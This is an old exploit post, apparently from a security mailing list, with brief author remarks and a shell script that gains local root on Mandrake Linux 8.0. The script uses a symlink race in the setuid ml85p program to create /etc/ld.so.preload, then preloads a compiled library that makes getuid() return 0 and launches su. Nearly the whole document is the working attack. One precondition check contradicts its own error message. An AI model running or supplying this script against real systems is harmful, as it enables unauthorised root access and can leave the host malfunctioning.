ml85p.sh

`Why code the exploit in C if you were just going to sprintf(); system()   
everything anyway? This is a bad exploit for a lame bug. I found this in april   
and wrote this exploit to muck around with /etc/ld.so.preload as a means of   
elevating privildges from symlink attacks locally. old news but still. this   
ml85 bug appears in Linux Mandrake 8.0. Thing is, this program is mode 4750   
root:sys so whatever...  
  
suid  
  
----  
  
#!/bin/sh  
# Exploit using /usr/bin/ml85p default setuid program on   
# Mandrake Linux 8.0  
#  
# You need to be in the sys group to be able to execute   
# ml85p.  
  
echo "** ml85p exploit"  
# set the required umask  
umask 0  
  
# get the number of seconds since 1970  
DATE=`date +"%s"`  
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]  
then  
echo "** this exploit requires that /usr/bin/ml85p is setuid and   
executable."  
exit 1  
fi  
  
if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]  
then  
echo "** this exploit requires that /etc/ld.so.preload does not exist."  
exit 1  
fi  
  
echo "** creating file"  
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"  
echo "bleh" | /usr/bin/ml85p -s  
rm /tmp/ml85g"$DATE"  
  
echo "** creating shared library"  
cat << _EOF_ > /tmp/g.c  
int getuid(void) { return(0); }  
_EOF_  
  
echo "** compiling and linking shared object"  
gcc -c -o /tmp/g.o /tmp/g.c  
ld -shared -o /tmp/g.so /tmp/g.o  
rm -f /tmp/g.c /tmp/g.o  
  
echo "** rigging ld.so.preload"  
echo "/tmp/g.so" > /etc/ld.so.preload  
echo "** execute su. warning all getuid() calls will return(0) until you remove"  
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so   
without"  
echo "** first fixing /etc/ld.so.preload may result in system malfunction"  
su -  
echo "** cleaning up"  
> /etc/ld.so.preload  
rm -f /tmp/g.so  
`